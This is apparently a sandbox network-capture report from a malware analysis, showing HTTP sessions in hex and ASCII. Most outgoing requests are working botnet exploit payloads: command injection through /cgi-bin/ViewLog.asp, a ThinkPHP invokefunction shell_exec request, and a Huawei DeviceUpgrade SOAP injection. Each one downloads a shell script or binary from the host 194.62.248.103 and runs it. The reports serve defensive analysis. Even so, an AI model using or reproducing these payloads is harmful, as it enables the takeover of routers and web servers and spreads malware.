                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:17.975878954 CEST271INHTTP/1.0 401 Unauthorized
                                                        Content-type: text/html
                                                        Date: Sun, 14 Apr 2024 18:18:24 GMT
                                                        Connection: close
                                                        WWW-Authenticate: Basic realm="iRZ-RUH2b-ROUTER"
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 31 3e 0a 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY><H1>401 Unauthorized</H1></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        127192.168.2.235211694.131.62.2368080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:17.222824097 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:17.441960096 CEST1260INHTTP/1.1 400 Bad Request
                                                        Server: squid/6.0.0-20220501-re899e0c27
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:35:17 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3572
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        Cache-Status: ezproxies.com
                                                        Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        128192.168.2.233641262.29.124.2138080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:17.342407942 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        129192.168.2.234789494.121.34.718080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:17.347409010 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        130192.168.2.235791095.101.221.10980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:17.429497004 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:17.746737003 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:35:17 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:17 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 38 37 31 30 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 31 37 26 23 34 36 3b 32 30 34 65 35 31 33 65 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 36 38 37 31 30 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 31 37 26 23 34 36 3b 32 30 34 65 35 31 33 65 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;6871002&#46;1713105317&#46;204e513e<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;6871002&#46;1713105317&#46;204e513e</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        131192.168.2.234453895.229.93.308080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:17.554039001 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:17.896907091 CEST1289INHTTP/1.0 200 OK
                                                        Server: DEFAULT IP PLATFORM
                                                        Content-type: text/html
                                                        Expires: Fri, 10 Apr 2008 14:00:00 GMT
                                                        Pragma: no-cache
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 65 6b 69 6e 65 78 20 62 79 20 53 42 53 20 2d 20 49 6e 74 65 72 66 61 63 63 69 61 20 4b 4e 58 2d 49 50 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 67 66 74 2e 63 73 73 22 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 65 6b 69 6e 65 78 2e 63 6f 6d 22 20 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 6c 6f 67 6f 2e 67 69 66 22 20 62 6f 72 64 65 72 20 3d 20 22 30 22 20 61 6c 74 3d 22 65 6b 69 6e 65 78 20 62 79 20 53 42 53 22 20 74 69 74 6c 65 3d 22 65 6b 69 6e 65 78 20 62 79 20 53 42 53 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 49 6e 74 65 72 66 61 63 63 69 61 20 4b 4e 58 2d 49 50 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 6e 61 76 22 3e 3c 64 69 76 20 69 64 3d 22 6e 61 76 68 22 3e 3c 2f 64 69 76 3e 0a 3c 75 6c 3e 3c 6c 69 20 69 64 3d 22 61 63 74 69 76 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 73 68 74 6d 6c 22 3e 44 65 76 69 63 65 20 49 6e 66 6f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6b 6e 78 2e 73 68 74 6d 6c 22 3e 4b 4e 58 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 75 70 64 61 74 65 2e 73 68 74 6d 6c 22 3e 55 70 64 61 74 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 22 3e 0a 3c 68 32 3e 44 65 76 69 63 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 20 63 6c 61 73 73 3d 22 69 74 62 22 3e 0a 3c 74 72 3e 3c 74 68 3e 53 74 61 74 75 73 3a 3c 2f 74 68 3e 3c 74 64 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 6e 6f 72 6d 61 6c 22 3e 6e 6f 72 6d 61 6c 20 6f 70 65 72 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 44 48 43 50 3a 3c 2f 74 68 3e 3c 74 64 3e 4f 66 66 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 49 50 20 41 64 64 72 65 73 73 3a 3c 2f 74 68 3e 3c 74 64 3e 31 39 32 2e 31 36 38 2e 31 2e 32 31 38 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 75 62 6e 65 74 20 4d 61 73 6b 3a 3c 2f 74 68 3e 3c 74 64 3e 32 35 35 2e 32 35 35 2e 32 35 33 2e 30 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 47 61 74 65 77 61 79 3a 3c 2f 74 68 3e 3c 74 64 3e 31 39 32 2e 31 36 38 2e 31 2e 31 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 44 4e 53 3a 3c 2f 74 68 3e 3c 74 64 3e 30 2e 30 2e 30 2e 30 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 48 74 74 70 20 50 6f 72 74 3a 3c 2f 74 68 3e 3c 74 64 3e 38 30 38 30 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 41 43 20 41 64 64 72 65 73 73 3a 3c 2f 74 68 3e 3c 74 64 3e 44 30 2d 37 36 2d 35 30 2d 30 30 2d 38 32 2d 42 30 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 48 6f 73 74 6e 61 6d 65 3a 3c 2f 74 68 3e 3c 74 64 3e 4b 4e 58 2d 49 50 49 46 2d 30 30 38 32 42 30 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html><head><title>ekinex by SBS - Interfaccia KNX-IP</title><link rel="stylesheet" type="text/css" href="gft.css"/><link rel="Shortcut icon" href="img/favicon.ico" type="image/x-icon"/></head><body><div id="logo"><a href="http://www.ekinex.com" ><img src="img/logo.gif" border = "0" alt="ekinex by SBS" title="ekinex by SBS"/></a></div><div id="header">Interfaccia KNX-IP</div><div id="nav"><div id="navh"></div><ul><li id="active"><a href="/index.shtml">Device Info</a></li><li><a href="/knx.shtml">KNX</a></li><li><a href="/update.shtml">Update</a></li></ul></div><div id="con"><h2>Device Information</h2><table class="itb"><tr><th>Status:</th><td><span class="statnormal">normal operation</span></td></tr><tr><th>DHCP:</th><td>Off</td></tr><tr><th>IP Address:</th><td>192.168.1.218</td></tr><tr><th>Subnet Mask:</th><td>255.255.253.0</td></tr><tr><th>Gateway:</th><td>192.168.1.1</td></tr><tr><th>DNS:</th><td>0.0.0.0</td></tr><tr><th>Http Port:</th><td>8080</td></tr><tr><th>MAC Address:</th><td>D0-76-50-00-82-B0</td></tr><tr><th>Hostname:</th><td>KNX-IPIF-0082B0</td></tr><t


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        132192.168.2.233425694.123.91.318080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:17.558346033 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        133192.168.2.234973262.29.9.248080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:17.562565088 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        134192.168.2.2348922112.216.25.6080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:17.727133036 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:18.021804094 CEST315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Sun, 14 Apr 2024 14:36:09 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        135192.168.2.2356154112.83.136.4580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:18.079283953 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:18.422868967 CEST517INHTTP/1.1 400 Bad Request
                                                        Server: Byte-nginx
                                                        Date: Sun, 14 Apr 2024 14:35:18 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 230
                                                        Connection: close
                                                        via: cache09.tzmp
                                                        x-request-ip: 81.181.54.60
                                                        x-tt-trace-tag: id=5
                                                        x-response-cinfo: 81.181.54.60
                                                        x-response-cache: miss
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 42 79 74 65 2d 6e 67 69 6e 78 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr/>Powered by Byte-nginx<hr><center>tengine</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        136192.168.2.233327641.42.21.21237215
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:18.247931004 CEST828OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
